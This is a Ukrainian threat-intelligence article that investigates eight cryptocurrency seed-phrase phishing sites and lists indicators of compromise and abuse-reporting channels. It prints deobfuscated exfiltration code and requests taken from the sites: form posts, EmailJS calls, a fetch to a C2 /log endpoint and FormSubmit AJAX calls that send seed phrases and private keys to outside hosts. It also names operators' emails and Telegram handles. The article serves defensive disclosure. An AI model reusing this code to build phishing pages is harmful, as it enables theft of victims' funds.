Назад до новин
Глибоке розслідування

Анатомія криптофішингу:
Аналіз 8 реальних атак

Ми перехопили фішинговий трафік у реальному часі, провели реверс-інжиніринг 5 програм для викрадення початкових фраз та відстежили викрадені дані до ботів у Telegram, облікових записів EmailJS та серверних частин сервісів «фішинг як послуга».

27 березня 2026 року Дослідження PhishDestroy 18 хвилин читання
Аналіз розслідування випадків криптофішингу
Аналіз перехопленого фішингового трафіку в режимі реального часу дозволяє виявити всю інфраструктуру атаки
8Проаналізовані сайти
7Методи виведення даних
1,824+Вкрадені облікові дані
380+Бренди гаманців
$0Вартість атакуючого

Що ми виявили

Щодня тисячі користувачів криптовалют втрачають свої кошти через фішингові сайти, які зовні нічим не відрізняються від справжніх сервісів гаманців. Але що відбувається позаду Фальшива кнопка «Connect Wallet»? Куди насправді надходить ваша фраза-посів?

Ми перехопили поточний HTTP-трафік з 5 активних фішингових сайтів, завантажили їхній повний вихідний код і відстежили кожен канал витоку даних аж до кінцевого пункту призначення. Це розслідування розкриває всю структуру сучасного криптофішингу — від прийомів соціальної інженерії, які змушують вас вводити фразу-посів, до бота в Telegram, який передає її зловмиснику в режимі реального часу.

Застереження

Усі фрази-насіння, наведені в цій статті, є тестовими даними, згенерованими у випадковому порядку. Під час цього розслідування жодні реальні облікові дані не були скомпрометовані. Про всі сайти було повідомлено відповідним хостинг-провайдерам та службам з боротьби зі зловживаннями.

Універсальна схема атаки

Незважаючи на різні бренди та серверні компоненти, усі 8 фішингових сайтів відповідають абсолютно така сама психологічна воронка:

Початкова сторінкаФормування довіри
Вибір гаманця60–110+ логотипів
Фальшиве повідомлення «Підключення...»Таймер на 3–5 секунд
«Помилка підключення»Завжди не вдається
Введення даних вручнуНасіння / Ключ / Сховище ключів
Витік данихTG / Електронна пошта / API

Ключова думка: анімація «Підключення...» завжди запрограмовано так, щоб не спрацювало. У вихідному коді сайту № 4 ми виявили const success = false — спроби підключення гаманця не відбувається. Весь цей процес існує виключно для того, щоб скерувати жертв до форми «Підключити вручну».

Шестиетапний ланцюжок криптофішингової атаки
Універсальний 6-етапний ланцюжок атак, спільний для всіх проаналізованих нами фішингових сайтів

8 об’єктів: повний огляд

1
Протокол мережевого рівня
networklayers.pages.dev
НаживоCloudflare PagesБот у Telegram + EmailJS

Видавання себе за іншу особу

Вигаданий «децентралізований протокол» для перевірки гаманців. Для підвищення довіри використовує тикери цін CryptoCompare у режимі реального часу та посилання на справжні блокчейн-експлорери (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano). На головній сторінці розміщено понад 100 логотипів гаманців та описано 3-етапний процес «перевірки».

Подвійний ланцюг виведення інформації

Найдосконаліший бекенд із усіх п’яти — кожні викрадені облікові дані надсилаються через два незалежні канали одночасно:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Результати аналізу OSINT

ПоказникЗначення
Лист від шахраяBestgrace309@gmail.com
Бот у Telegram@DewdropsTG_bot (ID: 7567323692)
Одержувач у Telegram@metatech2 (Ідентифікатор у чаті: 7350941887)
Бек-ендemailjs-backend-ovtg.onrender.com
Сервіс EmailJSservice_d5qigxs / template_7bqxeaa
Прихований доменlayerschain.in (з обфускації електронної пошти CF)
Надіслані повідомлення1 824+ (за ідентифікатором повідомлення в Telegram)
Вік домену2 дні (TLS: 25 березня 2026 року)
Порушення OPSEC

Електронну адресу зловмисника було виявлено в Коментар на JavaScript всередині config.js: // Bestgrace309@gmail.com. Вони забули видалити його перед розгортанням. Крім того, сервер ретрансляції Telegram є повністю відкритим — без аутентифікації та обмеження швидкості. Шляхом декодування даних Cloudflare data-cfemail крім заплутування коду в HTML, ми також виявили прихований адрес електронної пошти: support@layerschain.in, з підключенням до індійської та південноафриканської хостингової інфраструктури.

2
Міграція токенів AQLA
token-aqla.pages.dev
НаживоCloudflare PagesНестатичні форми

Видавання себе за іншу особу

Ідеальне відтворення реальності на рівні пікселів Aqualibre (AQLA) сторінка міграції токенів. У коді HTML міститься тег метаданих, що вказує на джерело: data-scrapbook-source="https://token.aqla.app/migration", з датою 19 листопада 2024 року.

Підхід «без коду»

Цьому зловмиснику потрібно зовсім немає коду на стороні сервера. Ця форма надсилає дані безпосередньо на Нестатичний — легітимний бекенд для статичних сайтів. Кожне подання пересилається на електронну адресу шахрая. Електронна адреса зловмисника — це ніколи не відображається у вихідному коді.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Вартість: 0 доларів

Cloudflare Pages: безкоштовно. Un-static Forms: безкоштовно. Доменів не придбано. Серверів не орендовано. Загальна вартість інфраструктури: нуль доларів.

3
SafePal Typosquat
antiresolve-mysafpalnode.pages.dev
Наживо Cloudflare Pages Нестатичні форми

Видавання себе за іншу особу

Субдомен містить "safpal" — це навмисна помилка в написанні слова SafePal, популярний апаратний гаманець. Сайт видає себе за «Blockchain Wallet Rectification» із 26 фейковими категоріями новин. Використовує Typed.js для анімації назв блокчейнів (Ethereum, BSC, Polygon...) та тікер LiveCoinWatch для створення враження достовірності.

Той самий комплект, той самий оператор?

Використовує абсолютно той самий шаблон фішингового листа як об’єкт № 2: ідентичний connect.html, ідентичний wallets.html з понад 60 логотипами, на базі того самого бекенду Un-static (з іншим ідентифікатором форми — 6f1b82c3...da9943af). Наявність ідентичного набору дає підстави припустити, що один оператор, який керує обома сайтами.

Помилки в коді: «Privay Policy» (бракує літери «c»), «seperated» (повинно бути «separated»), «Kestore» (бракує літери «y»). У полі для введення пароля використовується type="text" замість type="password".

4
Клон мережі Flare
flaremainnet.pages.dev
НаживоCloudflare PagesПодвійний EmailJS (резервування)

Видавання себе за іншу особу

Майже ідеальний клон Мережа Flare портал — справжній блокчейн EVM рівня 1 із протоколами FTSO та Data Connector. Відтворює понад 30 партнерів екосистеми, навігацію та брендинг. Фавікони завантажуються з типосквоту: portal.flaremainet.com (у слові «mainnet» бракує однієї літери «n»).

Подвійне резервування EmailJS

Єдиний сайт, який використовує дві окремі облікові записи EmailJS одночасно для забезпечення відмовостійкості проти ліквідації:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Тема електронного листа щодо кожного випадку крадіжки: "New Wallet Details from Flare".

Це підприємство, що отримує фінансування

HTML-код містить Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Захист від PPC від Lunio, а також Піксель реклами Twitter/X. Зловмисник виконує платна реклама щоб привести жертв на фішинговий сайт та відфільтрувати кліки ботів. Це не хобі — це операція, що фінансується, з аналітикою та витратами на рекламу.

Фішинговий сайт мережі Flare Network із використанням EmailJS та платної реклами
Сайт № 4: платна реклама, аналітичне відстеження та подвійна викрадення даних — найпрофесійніша операція
5
COIN NODE / Виправлення в гаманці (PhaaS)
swiftauthapps.pages.dev
Бекенд не працюєAPI PulseResolve (PhaaS)

Видавання себе за іншу особу

Загальна послуга «COIN NODE» / «Wallet Fix» (без зазначення конкретної марки). Авторські права «Wallet Fix 2022» — цьому шаблону набору щонайменше 4 роки. Зображення розміщені на pumpeth.com (WordPress на AWS).

«Фішинг як послуга»

Найбільш тривожна архітектура бекенду: а Багатокористувацький API на основі UUID:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Кожен шахрай отримує власний кінцевий пункт з унікальним ідентифікатором (UUID). Центральний оператор обслуговує API, відстежує кампанії та, можливо, отримує частину вкрадених коштів. Це організоване викрадення криптовалюти — модель «фішингу як послуги».

Супутня інфраструктура (практично недіюча)

ДоменРольСтатус
api.pulseresolve.comAPI для виведення данихNXDOMAIN
walletissuesfix.netХостинг фавіконівNXDOMAIN
syncwallet.onlineХостинг логотипівNXDOMAIN
pumpeth.comCDN для зображеньУ режимі реального часу (AWS)
Zombie Frontend

Бекенд не працює, але фронтенд досі працює на Cloudflare Pages. Якщо зловмисник перереєструє pulseresolve.com, сайт миттєво знову починає працювати.

6
Центр підтримки + Відновлення реєстру
wallet-support-39n.pages.dev та ledger-recovery.support
НаживоCloudflare Pages + ReplitНалаштоване API C2Автозаповнення BIP39

Видавання себе за іншу особу

A двостороння операція: загальний «Центр підтримки» за адресою wallet-support-39n.pages.dev з 15 вигаданими категоріями випусків та 39 брендами гаманців, а також Ідеальний клон процесу реєстрації в Ledger в ledger-recovery.support розміщено на Replit — із можливістю вибору моделі пристрою, налаштування PIN-коду та таблицею початкової фрази з 24 слів із справжня функція автозаповнення за алгоритмом BIP39.

Бекенд C2 для захисту від сканерів

Сторінка підтримки гаманця надсилає викрадені дані на api.uranustoken.org/log — власний C2 на базі nginx/Ubuntu за Cloudflare. Бекенд навмисно відхиляє всі запити GET (повертає код 522 «тайм-аут»), реагуючи лише на запити POST. Це означає, що сканери URL-адрес, роботи Google Safe Browsing та дослідники в галузі безпеки, які надсилають запити GET на цей кінцевий пункт, нічого не бачать — C2 здається неактивним.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Клон Ledger запускає окремий бекенд на Express.js безпосередньо на Replit: POST /api/recovery-phrase збір {deviceId, pin, phrase}. Він повертає 400 {"error":"Invalid data provided"} у разі некоректних вхідних даних — підтвердження того, що серверна частина працює та активно перевіряється викрадені дані.

Результати аналізу OSINT

ПоказникЗначення
Інтерфейс (гаманець)wallet-support-39n.pages.dev
Інтерфейс (Ledger)ledger-recovery.support (34.111.179.208)
C2 — серверна частина api.uranustoken.org → nginx/1.24.0 Ubuntu
IP-адреси C2104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
РеєстраторName.com (ledger-recovery.support)
Розгорнуто9 січня 2026 р. (заголовок «Last-Modified»)
Технологічний стек React + Vite + Tailwind v4.1 + Framer Motion
Найвища точність відтворення користувацького досвіду

Пакет JS розміром 466 КБ містить повний список слів BIP39 для автозаповнення в режимі реального часу: 67 згадок слова «passphrase» та 39 — «mnemonic». Клон Ledger супроводжує жертв через той самий процес реєстрації, що й справжній пристрій Ledger — це найпереконливіша фішингова сторінка за весь час цього розслідування. Цей apiKey поле в конфігурації вказує на багатокористувацька архітектура PhaaS.

7
Децентралізована платформа для запуску проєктів
mainnetvalidationapp.pages.dev
НаживоCloudflare PagesFormSubmit.co

Видавання себе за іншу особу

Універсальна «децентралізована платформа для запуску» з 21 категорія приманок (стейкінг, міграція, KYC, розіграші, отримання винагород, відновлення активів, попередній продаж, випуск NFT, заблоковані облікові записи...) та Понад 70 брендів гаманців — один із найповніших списків гаманців, які нам траплялися. Характерна орфографічна помилка «Sychronize» (відсутня літера «n») викриває підробку.

Конвеєр FormSubmit Pipeline

Застосування FormSubmit.co — легальний сервіс для надсилання форм на електронну пошту. Хеш кінцевої точки a2cf4131f1a5d39453c7c183df96f86f — це MD5-хаш адреси електронної пошти шахрая. Ми перевірили методом повного перебору сотні шаблонів адрес електронної пошти в сервісах Gmail, Yahoo, Hotmail, ProtonMail, Yandex та Mail.ru — не знайдено. Шахрай використовує незвичайну або випадково згенеровану адресу електронної пошти.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Результати аналізу OSINT

ПоказникЗначення
Доменmainnetvalidationapp.pages.dev
Хеш FormSubmita2cf4131f1a5d39453c7c183df96f86f
Ідентифікатор кампаніїDAPP — ДЕЦЕНТРАЛІЗОВАНИЙ
Набір FontAwesomebdc3291137 (комплект № 112310842, безкоштовна версія 6.7.2)
jQuery3.2.1 + 3.5.1 завантажуються одночасно
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (несумісність)
Дві ручки для перенесення

Набір FontAwesome bdc3291137 — FontAwesome може визначити власника облікового запису, пов’язаного з цим ідентифікатором набору. Тег кампанії DAPP DECENTRALIZED може з’являтися на інших фішингових сайтах, що використовують той самий хеш FormSubmit. Після викрадення початкової фрази, підроблений QR-код і випадковий 7-символьний код посилання відображається повідомлення: «Зверніться до адміністратора, вказавши свій унікальний реф-код» — змушуючи жертв чекати, замість того щоб проводити розслідування.

8
R2 Bucket + PHP на домашньому комп’ютері
pub-519769e9eb634616b1746c2018641d56.r2.dev
МертвийCloudflare R2PHP + DDNS

Видавання себе за іншу особу

Невідомо — і фронтенд, і бекенд перебувають у режимі офлайн. Судячи зі структури корисного навантаження, це була програма для викрадення фраз-посівів криптовалютних гаманців. Ця Публічний контейнер Cloudflare R2 (об'єктне сховище, а не Pages) — це добре задокументований вектор фішингу за даними компанії Netskope, було виявлено понад 5 000 шкідливих сторінок, а обсяг трафіку зріс у 61 разів.

Налаштування для «скрипт-кідді»

Найбільш примітивна операція у цій колекції. Фрази-насіння надсилаються слово за словом до PHP-скрипта, що працює на домашньому комп’ютері або VPS, підключеному через безкоштовну службу динамічного DNS:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Результати аналізу OSINT

ПоказникЗначення
Інтерфейс користувача pub-519769e9eb634616b1746c2018641d56.r2.dev [ОФЛАЙН]
Бек-енд mercifuljigga4real123.publicvm.com [NXDOMAIN]
Ідентифікатор відра R2519769e9eb634616b1746c2018641d56
Провайдер DDNS DNSExit.com / Netdorm, Inc. (Цинциннаті, штат Огайо)
DNS NSns10–13.dnsexit.com
Ім'я користувачаmercifuljigga4real123
Ім'я користувача OSINT: mercifuljigga4real123

«Merciful» + «jigga» (прізвисько Джей-Зі) + «4real» + «123» — цілком особистий нік, що свідчить про прихильність до хіп-хоп-культури. Не знайдено на будь-якій платформі, що індексується: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch або Steam. Ймовірно, веде активність у Discord, Telegram або на ігрових платформах під цим ім’ям або його близькими варіантами. Ім’я файлу fuc.php відповідає нестандартному стилю ручки.

7 способів викрасти вашу фразу-насіння

Порівняння чотирьох методів викрадення даних у криптовалютному фішингу
Сім різних архітектур витоку даних, що використовуються на 8 фішингових сайтах
МетодСайтиЯк це працюєШвидкістьВартість
Бот у Telegram#1 Express.js на Render.com використовує проксі-сервер для підключення до Bot API. Шахрай миттєво отримує приватне повідомлення з обліковими даними. У режимі реального часу$0
EmailJS#1, #4 JavaScript на стороні клієнта надсилає дані безпосередньо до API EmailJS, який, у свою чергу, доставляє їх на електронну пошту шахрая. ~1 хв$0
Нестатичні форми#2, #3 Стандартна HTML-форма з методом POST, що надсилає дані до легітимного сервісу обробки форм, який пересилає отримані дані електронною поштою. ~1 хв$0
FormSubmit.co#7 jQuery AJAX на FormSubmit.co. Адреса електронної пошти прихована за хешем MD5. Кампанія позначена тегом «DAPP DECENTRALIZED». ~1 хв$0
Налаштоване API C2#6 React SPA надсилає запити до API nginx/Express, що працює за Cloudflare. Відхиляє GET-запити (522) для уникнення сканерів. Відповідає лише на запити POST. У режимі реального часу~5 доларів на місяць
PHP + DDNS#8 PHP-скрипт на домашньому комп’ютері через безкоштовну службу динамічного DNS (publicvm.com). Фраза-насіння надсилається слово за словом. У режимі реального часу$0
API PhaaS#5 Багатокористувацький API на основі UUID. Центральний оператор управляє серверною частиною, а шахраї орендують кінцеві точки. У режимі реального часуНевідомо

7 тривожних ознак, що викривають будь-який фішинговий сайт

Якщо ви побачите будь-який якщо це так, негайно закрийте вкладку:

1. Повідомлення «Помилка підключення» завжди є фальшивим

Справжні підключення до гаманців здійснюються за допомогою протоколу WalletConnect або розширень для браузера. Вони ніколи не відображають помилку «Помилка підключення», яка вимагає ввести фразу-насіння.

2. 50–110+ логотипів гаманців, одне місце призначення

Кожна іконка гаманця веде до однієї й тієї ж форми. Справжній сервіс інтегрував би власний SDK кожного гаманця.

3. Повідомлення «Помилка» після відправлення

Фальшива «Помилка 503» або «Невідома помилка», що з’являється після відправлення, є навмисною. Ваші дані вже вкрадено — ця помилка змушує вас спробувати ще раз, використовуючи інший гаманець.

4. Розміщено на .pages.dev

Усі 5 сайтів зловживають безкоштовним тарифом Cloudflare Pages. Перевірка особи не потрібна. У 2025 році кількість випадків фішингового зловживання Cloudflare Pages зросла на 198%.

5. Три вкладки: «Фраза» / «Приватний ключ» / «Сховище ключів»

Жодна легітимна служба не вимагає всіх трьох типів облікових даних. Ця форма з трьома вкладками є характерною ознакою фішингового набору.

6. Відсутність взаємодії з блокчейном

Жоден із цих сайтів не завантажується ethers.js, web3.js, або здійснювати будь-які RPC-виклики. Це звичайні HTML-форми, які лише імітують dApps.

7. Інфраструктура з нульовими витратами

Безкоштовний хостинг + безкоштовні сервіси для створення форм + безкоштовний обмін повідомленнями = повноцінна фішингова операція за 0 доларів. Якщо сайт не має справжнього домену, будьте обережні.

Повна таблиця IOC

Для команд з безпеки, платформ з аналітики загроз та осіб, які повідомляють про зловживання:

Домени та інфраструктура

ДоменТипСтатус
networklayers.pages.devІнтерфейс фішингового сайтуНаживо
token-aqla.pages.devІнтерфейс фішингового сайтуНаживо
antiresolve-mysafpalnode.pages.devІнтерфейс фішингового сайтуНаживо
flaremainnet.pages.devІнтерфейс фішингового сайтуНаживо
swiftauthapps.pages.devІнтерфейс фішингового сайтуНаживо
emailjs-backend-ovtg.onrender.comБекенд реле TGНаживо
portal.flaremainet.comРесурси, пов’язані з типосквотингомНевідомо
layerschain.inПов’язаний доменDNS не працює
api.pulseresolve.comБек-енд PhaaSNXDOMAIN
walletissuesfix.netХост активівNXDOMAIN
syncwallet.onlineХостинг логотипівNXDOMAIN
pumpeth.comCDN для зображеньУ режимі реального часу (AWS)
wallet-support-39n.pages.devІнтерфейс фішингового сайтуНаживо
ledger-recovery.supportФішинг у Ledger (Replit)Наживо
api.uranustoken.orgБекенд C2 (nginx/Ubuntu)Наживо
uranustoken.orgКореневий домен404
mainnetvalidationapp.pages.devІнтерфейс фішингового сайтуНаживо
pub-519769e9eb634616b1746c2018641d56.r2.devФішинг (категорія R2)Офлайн
mercifuljigga4real123.publicvm.comPHP-бекенд (DDNS)NXDOMAIN

Облікові записи та ідентифікатори

ТипЗначенняСайт
Електронна поштаBestgrace309@gmail.com#1
Електронна пошта (приховано)support@layerschain.in#1
Бот у Telegram@DewdropsTG_bot (7567323692)#1
Користувач Telegram@metatech2 (7350941887)#1
EmailJS № 1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS № 2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS № 3service_isy47de / JsVEgXVcaSTro1etu#4
Нестатична формаc78173e2d991...94c3f76#2
Нестатична форма6f1b82c3ce55...da9943af#3
UUID PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Інстанція візуалізаціїrndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5-сума перевірки формиa2cf4131f1a5d39453c7c183df96f86f#7
Теги кампаніїDAPP — ДЕЦЕНТРАЛІЗОВАНИЙ#7
Набір FontAwesomebdc3291137 (комплект № 112310842)#7
Ідентифікатор відра R2519769e9eb634616b1746c2018641d56#8
Ім'я користувача/DDNSmercifuljigga4real123#8

Куди повідомляти про фішинг, пов’язаний з криптовалютами

Куди повідомляти про фішингові сайти, пов’язані з криптовалютами — багатовекторна ліквідація
Одночасне націлювання на хостинг, сервіси бекенду та платформи обміну повідомленнями для досягнення максимальної швидкості ліквідації
ПослугиПро що слід повідомлятиЯк
Cloudflare7 облікових записів .pages.dev + 1 контейнер R2abuse.cloudflare.com
Google Safe BrowsingУсі фішингові URL-адресиПовідомити про фішинг
PhishTankУсі URL-адреси для списку заблокованих користувачів спільнотиphishtank.org
EmailJS3 облікові записи, що зазнали зловживання (ідентифікатори сервісу вказано вище)abuse@emailjs.com
Нестатичний2 кінцеві точки формиЗв’яжіться з нами через un-static.com
Render.comБекенд ретрансляції TelegramВідправити форму про зловживання
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comПовідомлення про зловживання в Google
Twitter/XРекламний обліковий запис для просування сайту № 4X: Повідомити про зловживання в рекламі
FormSubmit.coХеш a2cf4131... (#7)Форма для повідомлення про зловживання FormSubmit
Replitledger-recovery.support (#6)Повідомлення про зловживання в Replit
Name.comРеєстратор для сайту ledger-recovery.supportЗловживання на сайті Name.com
DNSExitmercifuljigga4real123.publicvm.comЗловживання на сайті dnsexit.com
FontAwesomeКомплект bdc3291137 (№ 7)Зловживання FontAwesome
ChainabuseУсі фішингові кампаніїChainabuse.com

Як захистити себе

Золоте правило

Жодна надійна служба ніколи не попросить вас ввести вашу фразу-насіння на веб-сайті. Фрази-насіння вводяться виключно в офіційне програмне забезпечення гаманця під час його відновлення — ні в якому разі не на сторонніх веб-сайтах, що пропонують послуги «перевірки», «синхронізації» чи «відновлення».

Перед підключенням будь-якого гаманця:

  • Переконайтеся, що URL-адреса відповідає офіційному домену. Перевірте дані SSL-сертифіката.
  • Справжній WalletConnect використовує QR-код або глибоке посилання — ніколи не використовує форму «сід-фрази».
  • Якщо «підключення не вдалося» і вас просять ввести облікові дані вручну — це фішинг.
  • Перевірте підозрілі URL-адреси на PhishTank або VirusTotal перед тим, як почати спілкування.
  • Використовуйте апаратний гаманець — він вимагає фізичного підтвердження кожної транзакції.
  • Додавайте офіційні URL-адреси до закладок. Ніколи не переходьте за посиланнями з реклами, приватних повідомлень або соціальних мереж.

Таксономія криптофішингу

Злодії фраз-посівів — це лише одна з категорій. Ось повна картина фішингу в сфері криптовалют — ми будемо додавати детальні огляди кожного типу.

Програми для викрадення фраз-насіння
Підроблені сторінки «Connect Wallet», які спонукають вас ввести фразу відновлення. У центрі уваги цієї статті — детальний аналіз 5 реальних прикладів.
Про що йшлося вище
Викрадення схвалення
Шкідливі децентралізовані додатки (dApps), які запитують необмежене право на затвердження транзакцій з токенами через MetaMask. Після затвердження зловмисник викачує кошти з вашого гаманця, не маючи при цьому вашої посівної фрази.
Скоро
«Льодовий фішинг» (Permit2)
Використовує безгазові дозволи EIP-2612. Жертва підписує позаланцюгове повідомлення, яке надає права на передачу токенів — до моменту виведення коштів у ланцюгу не видно жодного підтвердження.
Скоро
Неправдиві заяви про айрдропи
Фейкові айрдропи токенів, які вимагають «отримання» через шкідливий смарт-контракт. Транзакція отримання насправді призводить до виведення ваших справжніх токенів.
Скоро
Програми, що перехоплюють вміст буфера обміну
Шкідливе програмне забезпечення, яке відстежує вміст вашого буфера обміну та непомітно замінює скопійовані адреси гаманців на адресу зловмисника ще до того, як ви вставите їх.
Скоро
Пил + отруєння
Незначні транзакції з адрес, схожих на вашу, захаращують вашу історію. Жертва копіює підроблену адресу з історії транзакцій для свого наступного переказу.
Скоро

Неприємна правда

Витрати на організацію фішингової операції з криптовалютою $0 і займає менше 30 хвилин. Безкоштовний хостинг, сервіси для створення форм, безкоштовні боти для обміну повідомленнями. Зловмисник, який стоїть за сайтом № 1, вже викрав облікові дані з 1 824+ жертв. Сайт № 4 працює платна реклама у відповідному масштабі. Це не аматорство — це ціла галузь. Єдиний захист — це обізнаність.

Допоможіть нам дати відсіч

PhishDestroy відстежує та повідомляє про криптофішингові сайти в режимі реального часу. Якщо ви натрапили на підозрілий сайт, повідомте нам про це — ми проведемо розслідування та докладемо зусиль, щоб його закрили.

Пов’язані розслідування

Розслідування
Кінець xmrwallet.com: NameSilo збрехало, щоб захистити злодія з літери «М»
10-річна крадіжка Monero. У справі брали участь 3 реєстратори. NameSilo вигадало 7 брехень.
Детальний аналіз
Мережі «Crypto Drainer»: розкриття інфраструктури
Як оператори, що надають послуги «дрейнер-як-послуга», спільно використовують інфраструктуру та персонал.
Панель відкрита
Панель фішингу Trust Wallet: повний адміністративний доступ
Нам вдалося отримати доступ до адміністративної панелі фішингової операції, пов’язаної з Trust Wallet.
Інфраструктура
Викрито інфраструктуру шахрайства: спільні серверні компоненти
Як шахрайські операції використовують спільні сервери, шаблони та платіжні потоки.

Поділитися цим розслідуванням

X / Twitter Telegram Reddit LinkedIn

Пов’язані розслідування

Панель з фішингових атак на Trust Wallet: викрадено 239 тис. доларів, 6 зловмисників
ГЛИБОКЕ РОЗСЛІДУВАННЯ
Панель з фішингових атак на Trust Wallet: викрадено 239 тис. доларів, 6 зловмисників
Набір інструментів «Crypto Drainer»: викрито реселерів «Angel Drainer»
ГЛИБОКЕ РОЗСЛІДУВАННЯ
Набір інструментів «Crypto Drainer»: викрито реселерів «Angel Drainer»
Викриття шахраїв: детальний аналіз 4 шахрайських сервісів
РОЗСЛІДУВАННЯ
Викриття шахраїв: детальний аналіз 4 шахрайських сервісів